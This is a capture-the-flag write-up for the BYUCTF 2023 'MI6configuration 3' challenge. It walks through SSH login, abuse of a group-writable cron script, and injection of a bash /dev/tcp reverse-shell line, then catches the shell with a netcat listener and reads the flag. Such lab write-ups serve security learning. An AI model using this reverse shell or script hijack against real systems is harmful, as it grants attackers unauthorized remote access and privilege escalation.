# MI6configuration 3

+ Using james_bond credentials tried to login on ssh.

```sh
┌─[attacker@parrot]─[~]
└──╼ $ssh [email protected]
The authenticity of host '192.168.0.133 (192.168.0.133)' can't be established.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.133' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-208-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Sat May 6 21:50:34 2023
$ ls
james_bond q Shared
$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Apr 17 15:43 .
drwxr-xr-x 23 root root 4096 Apr 17 15:40 ..
dr-x------ 2 james_bond root 4096 Apr 17 22:01 james_bond
dr-x------ 2 q root 4096 May 3 10:27 q
dr-xr-x--- 2 q agents 4096 May 3 10:27 Shared
$ id
uid=1002(james_bond) gid=1003(james_bond) groups=1003(james_bond),1002(agents)
$ cd Shared
$ ls -la
total 12
dr-xr-x--- 2 q agents 4096 May 3 10:27 .
drwxr-xr-x 5 root root 4096 Apr 17 15:43 ..
-rwxrw---- 1 q agents 168 May 3 10:27 update.sh
$

```

As we see there total 3 folders present in `home` . `Shared` folder was accessible to `q` and `agents` group. As we can see with the `id` command `james_bond` was the member of agents group. So we `cd` into **Shared** folder and in Shared, `update.sh` owned by `q` and can be read and write by the group agents. So looking at the update.sh have this

```sh
$ cat update.sh
#!/bin/bash
#This command will run every two minutes and scan for running processes
#Doing so will protect us from being hacked
#Please do not change this file
ps -aux
$
```

We can add a payload to the update.sh which will be executed by the user `q` for every 2 min.

Reverse shell payload for the bash : `bash -i >& /dev/tcp/192.168.0.110/8080 0>&1`

```sh
$ cat update.sh
#!/bin/bash
#This command will run every two minutes and scan for running processes
#Doing so will protect us from being hacked
#Please do not change this file
#ps -aux
bash -i >& /dev/tcp/192.168.0.110/8080 0>&1

$
```

And started a lister on port 8080 in my parrot machine. After 2 min I got a reverse shell on `q` machine

```sh
┌─[attacker@parrot]─[~]
└──╼ $nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.0.110] from (UNKNOWN) [192.168.0.133] 44932
bash: cannot set terminal process group (982): Inappropriate ioctl for device
bash: no job control in this shell
q@MI6:~$ ls
ls
flag3.txt
q@MI6:~$ cat flag3.txt
cat flag3.txt
byuctf{cronjobzz}
q@MI6:~$

```

> `Flag 3 : byuctf{cronjobzz}`

# [Original Writeup](https://themj0ln1r.github.io/posts/byuctf23)

Original writeup (https://themj0ln1r.github.io/posts/byuctf23).